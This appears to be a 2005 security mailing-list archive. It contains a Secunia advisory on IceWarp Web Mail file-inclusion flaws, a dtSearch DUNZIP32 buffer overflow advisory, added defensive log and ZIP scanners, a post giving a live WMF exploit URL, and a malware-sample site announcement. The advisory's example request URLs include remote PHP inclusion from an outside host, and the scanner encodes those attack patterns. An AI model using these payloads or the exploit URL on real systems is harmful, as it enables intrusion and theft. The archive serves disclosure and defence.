Verification.........................................................9

== 
1) Affected Software 

* Merak Mail Server version 8.3.0.r.
* VisNetic Mail Server version 8.3.0 build 1.

Other versions may also be affected.

== 
2) Severity 

Rating: Highly Critical
Impact: System access
Exposure of sensitive information
Where:  Remote

== 
3) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in IceWarp Web 
Mail, which can be exploited by malicious users and by malicious
people to disclose potentially sensitive information and to compromise
a vulnerable system.

1) The webmail and webadmin services run with PHP configured with
"register_global" enabled. The "language" and "lang_settings"
variables in "/accounts/inc/include.php" and "/admin/inc/include.php"
are not properly initialised when the scripts are accessed directly.
This makes it possible to overwrite the variables to cause the scripts
to include arbitrary PHP scripts from local and remote sources.

Example:
http://[host]:32000/accounts/inc/include.php?
language=0&lang_settings[0][1]=http://[host]/
http://[host]:32000/admin/inc/include.php?
language=0&lang_settings[0][1]=http://[host]/

Successful exploitation allows execution of arbitrary PHP code on a
vulnerable server with SYSTEM privileges without requiring
authentication.


2) Input passed to the "lang" parameter in "/dir/include.html" isn't
properly validated before being used to include files. This can be
exploited to include arbitrary files from local sources.

Example:
http://[host]:32000/dir/include.html?lang=[file]%00

Successful exploitation allows disclosure of arbitrary files on a
vulnerable server without requiring authentication.


3) Input passed to the "language" parameter in "/mail/settings.html"
isn't properly validated before being saved to the database. This
can be exploited in conjunction with overwrite of the "lang_settings"
variable, to include arbitrary PHP scripts from local and remote
sources.

Example:
http://[host]:32000/mail/settings.html?
id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?
id=[current_id]&lang_settings[TEST]=test;http://[host]/;

Successful exploitation allows execution of arbitrary PHP scripts on
a vulnerable server with SYSTEM privileges but requires a valid logon.


4) The "default_layout" and "layout_settings" variables are not
properly initialised when "/mail/include.html" encounters a
HTTP_USER_AGENT string that it does not recognise. This can be
exploited in conjunction with overwrite of the "default_layout" and
"layout_settings" variables to disclose the content of local files.

Example (using non-IE/Mozilla/Firefox browser):
http://[host]:32000/mail/index.html?/mail/index.html?
default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2

Successful exploitation allows disclosure of arbitrary files on a
vulnerable server without requiring authentication.

== 
4) Solution 

Merak Mail Server:
Update to version 8.3.5.r.

VisNetic Mail Server:
Update to version 8.3.5.

== 
5) Time Table 

07/12/2005 - Initial vendor notification.
07/12/2005 - Initial vendor reply.
27/12/2005 - Public disclosure.

== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

== 
7) References

No other references available.

== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to o
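Defensive triage for the four request shapes in this advisory, as an added example (not Secunia's or IceWarp's code): a small access-log scanner run over constructed Apache combined-format lines. The rule names and the 198.51.100.7 host standing in for an attacker-controlled server are my own.

```python
"""Access-log triage for the IceWarp Web Mail request shapes described above.

Added example, not Secunia's or IceWarp's code. It parses Apache combined-format
lines (the samples below are constructed) and flags requests that look like the
advisory's four examples. Rule names are my own.
"""
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INCLUDE_SCRIPTS = ("/accounts/inc/include.php", "/admin/inc/include.php")


def classify(target: str) -> list[str]:
    """Return the rule names a request target triggers (empty when clean)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = unquote(parts.query)  # decode once so %5B and %00 compare as [ and NUL
    hits = []
    # 1) include.php reached directly with the uninitialised lang_settings supplied
    if path.endswith(INCLUDE_SCRIPTS) and "lang_settings[" in query:
        hits.append("include-php-lang_settings-overwrite")
    # 2) dir/include.html?lang= carrying a null byte to cut the include path short
    if path.endswith("/dir/include.html") and "lang=" in query and "\x00" in query:
        hits.append("dir-include-null-byte")
    # 3) lang_settings[...] handed to mail/index.html (the post-login variant)
    if path.endswith("/mail/index.html") and "lang_settings[" in query:
        hits.append("mail-index-lang_settings-overwrite")
    # 4) default_layout / layout_settings supplied by the client
    if path.endswith("/mail/index.html") and (
        "layout_settings[" in query or "default_layout=" in query
    ):
        hits.append("mail-index-layout-overwrite")
    # A remote URL in an already-suspicious query points at remote inclusion
    if hits and re.search(r"https?://", query):
        hits.append("remote-url-in-query")
    return hits


def scan(lines) -> list[tuple[int, str, str]]:
    """(line index, client ip, rule) for every line that triggers a rule."""
    findings = []
    for i, line in enumerate(lines):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for rule in classify(m["target"]):
            findings.append((i, m["ip"], rule))
    return findings


# Constructed sample log; 198.51.100.7 stands in for an attacker-controlled host.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Dec/2005:10:00:01 +0100] "GET /mail/index.html?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Dec/2005:10:00:02 +0100] "GET /accounts/inc/include.php'
    '?language=0&lang_settings[0][1]=http://198.51.100.7/ HTTP/1.1" 200 312',
    '203.0.113.9 - - [27/Dec/2005:10:00:03 +0100] "GET /dir/include.html?lang=somefile%00 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [27/Dec/2005:10:00:04 +0100] "GET /mail/index.html'
    '?id=42&lang_settings[TEST]=test;http://198.51.100.7/; HTTP/1.1" 200 77',
    '203.0.113.9 - - [27/Dec/2005:10:00:05 +0100] "GET /mail/index.html?/mail/index.html'
    '?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;somefile%00;2 HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for idx, ip, rule in scan(SAMPLE_LOG):
        print(f"line {idx}: {ip} -> {rule}")
```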

dtSearch DUNZIP32.dll Buffer Overflow Vulnerability

2005-12-27 Thread Juha-Matti Laurio

Networksecurity.fi Security Advisory (21-12-2005)

Title: dtSearch DUNZIP32.dll Buffer Overflow Vulnerability
Criticality: High (3/3)
Affected software: dtSearch versions prior to 7.20 Build 7136
Author: Juha-Matti Laurio
Date: 21st December, 2005
Advisory ID: Networksecurity.fi Security Advisory (21-12-2005) (#15)
CVE reference: CVE-2004-1094

- From the vendor:
"Instantly Search Terabytes of Text
The dtSearch product line can instantly search terabytes of text across 
a desktop, network, Internet or Intranet site."


- Description:
dtSearch document search system is confirmed to be affected by a remote
buffer overflow vulnerability.
The vulnerability is caused by a boundary error in a remarkably old,
vulnerable version of a 3rd-party compression library (DUNZIP32.dll)
used when handling packed .ZIP documents. The InnerMedia DynaZip
compression library mentioned is responsible for indexing and display
operations. This can be exploited to cause a buffer overflow via a
specially crafted zipped document. When a specially crafted .zip
document containing a file with an overly long filename (a file name or
files inside a ZIP) is opened, the application will crash and the
attacker may be able to execute arbitrary code on the user's system (see
US-CERT VU#582498 reference).


- Detailed description:
The affected DynaZip library examined is a version from December 2002,
file version 5.0.0.2. According to the InnerMedia company, versions
5.00.03 and prior are affected.
The following remarkably old file was copied to the C:\Program
Files\dtSearch\bin directory during the installation process when tested:

File name: dunzip32.dll
Date stamp: 6th December, 2002 04:05PM
File version: 5.0.0.2
Description: DynaZIP-32 Multi-Threading UnZIP DLL

NOTE: Dunzip32.dll is installed into the same directory as the
application executable of dtSearch Engine if dtSearch has been installed
on end-users' machines. If the situation is as described, updating the
library on end-users' machines by applying a software update is also
needed.



From US-CERT VU#582498:

"Impact:
If a remote attacker can persuade a user to access a specially crafted 
zip file, the attacker may be able to execute arbitrary code on that 
user's system possibly with elevated privileges."


- Affected versions:
The vulnerability has been confirmed in dtSearch Desktop with Spider 
version 7.10 (Build 7045). Other versions may also be affected.

The newest dtSearch version from 6.x product line is dtSearch 6.5 Build 6608.
All earlier versions (vendor's Web pages list versions 1.x to 5.25) are 
probably affected as well.


- OS:
Microsoft Windows (Win 95/98/ME/NT/2000/XP/2003/.NET)
Tests were done with Microsoft Windows XP Professional SP2 and Microsoft
Windows 2000 Professional SP4, fully patched.


- Solution status:
Vendor has issued a patch shipped with immune library version 5.00.07. 
It can be obtained by downloading a patch from:

http://www.dtsearch.com/download.html#upgrades

- Software:
dtSearch 7.x
dtSearch 6.x
http://www.dtsearch.com/PLF_desktop.html (Desktop with Spider)

Vendor and vendor Home Page:
dtSearch Corp.
http://www.dtsearch.com

Vendor product Web page:
http://www.dtsearch.com/PLF_desktop.html (Desktop with Spider)

- Solution:
Apply a patch 7.20 Build 7136 (version number 7.20.7136.1):
http://www.dtsearch.com/download.html#upgrades

- CVE information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2004-1094 on 20th December, 2005 to this issue. This is a 
candidate for inclusion in the CVE list (http://cve.mitre.org ), which 
standardizes names for security problems.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1094
The CVSS (Common Vulnerability Scoring System) severity level metric of 
issue CVE-2004-1094: 10 (High)


- References:
US-CERT VU#582498:
"InnerMedia DynaZip library vulnerable to buffer overflow via long file names"
http://www.kb.cert.org/vuls/id/582498

From the vulnerability note:
"Users are encouraged to contact their software vendors if they suspect 
they are vulnerable."

Upgrade information for version 6.x or earlier:
http://support.dtsearch.com/faq/dts0201.htm

Credit information:
This vulnerability was researched by Juha-Matti Laurio, 
Networksecurity.fi (Finland).


Timeline:
12-Oct-2005 - Vulnerability researched and confirmed
05-Nov-2005 - Vendor was contacted
05-Nov-2005 - Vendor's reply, vendor informed about upcoming, fixed 
version and timeline

06-Nov-2005 - Vendor issues a patch, detailed research
20-Dec-2005 - CVE information submission sent to Mitre.org
20-Dec-2005 - Mitre.org assigns CVE-2004-1094
21-Dec-2005 - Security companies and several CERT units contacted
23-Dec-2005 - Public disclosure

The full version of the security advisory is located at
http://www.networksecurity.fi/advisories/dtsearch.html


Networksecurity.fi Weblog (Finnish language): 
http://networksecurity.typepad.com/
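A pre-indexing screen for the condition this advisory describes, as an added example (not dtSearch's or InnerMedia's code): it lists the archive's central directory with Python's zipfile and rejects archives carrying an over-long entry name before any unzip engine touches them. The 255-byte limit and the constructed sample archives are my assumptions; the advisory does not give the exact threshold.

```python
"""Screen ZIP archives for over-long entry names before an unzip library sees them.

Added example, not dtSearch's or InnerMedia's code. The advisory says the crash
is triggered by an entry whose file name is overly long, so this check walks the
central directory with Python's zipfile and reports any entry whose name exceeds
a limit. The 255-byte limit and the constructed sample archives are assumptions;
the advisory does not state the exact threshold.
"""
import io
import zipfile

MAX_NAME_BYTES = 255  # assumption: length of a single Windows path component


def oversized_entries(data: bytes, limit: int = MAX_NAME_BYTES) -> list[tuple[str, int]]:
    """Return (shortened name, byte length) for entries whose name exceeds limit.

    Only the central directory is read; nothing is extracted, so the archive is
    inspected without being handed to the unzip engine it might crash.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # zipfile has already decoded the name; re-encode to approximate the
            # byte count the DLL would copy into its buffer.
            name_len = len(info.filename.encode("utf-8"))
            if name_len > limit:
                findings.append((info.filename[:32] + "...", name_len))
    return findings


def is_safe_to_index(data: bytes, limit: int = MAX_NAME_BYTES) -> bool:
    """True only for a well-formed archive with no over-long names."""
    try:
        return not oversized_entries(data, limit)
    except zipfile.BadZipFile:
        return False  # a broken archive is rejected rather than trusted


def make_zip(names) -> bytes:
    """Constructed sample: an in-memory archive with one empty file per name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in names:
            zf.writestr(name, b"")
    return buf.getvalue()


if __name__ == "__main__":
    ok = make_zip(["report.doc", "notes/readme.txt"])
    bad = make_zip(["A" * 300 + ".doc"])
    print("ok archive safe:", is_safe_to_index(ok))
    print("bad archive safe:", is_safe_to_index(bad), oversized_entries(bad))
```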




Is this a new exploit?

2005-12-27 Thread noemailpls
Warning: the following URL successfully exploited a fully patched Windows XP
system with a freshly updated Norton Anti-Virus.

unionseek.com/d/t1/wmf_exp.htm

The URL runs a .wmf and executes the virus; F-Secure will pick up the virus,
Norton will not.


Malware sample site

2005-12-27 Thread mvalsmith
Just wanted to let you guys know about a new computer security site at
http://www.offensivecomputing.net

The purpose of this site is to foster collaborative analysis, cataloging and
identification of malware in order to improve defense and awareness.
This is something I and other colleagues have seen the need for for a long
time but could never find anything similar, because most malware
collections are either closed lists or corporate non-public collections.
This site is free and open to all.

The basic idea is to have a community site where you can search for malware
based on name or md5sum and get zipped copies.
People can upload their own samples of malware and collaborate on analysis
in a sort of a blog style. (think community commented
disassembles, graphs, ida databases, etc.)

I know there are some problems with the concept, such as using md5sums, but
it's a start and has proven useful already.
I've got some malware collection stuff to help add to the database and I
have a small collection built up over the years
that I am slowly adding as well.

I've started it off with some copies of common stuff like welchia, sobig,
the sony drm rootkit, etc. and some minimal analysis.

This is NOT another Vx'ers site and the purpose isn't to propagate worms or
viruses but rather provide a medium for people to
conduct collaborative defense research with full access to the tools and
samples.

We're interested in any feedback, collaborations, and ideas from the
community and have already gotten a ton of response since launching last
Friday.

have a good one,

V.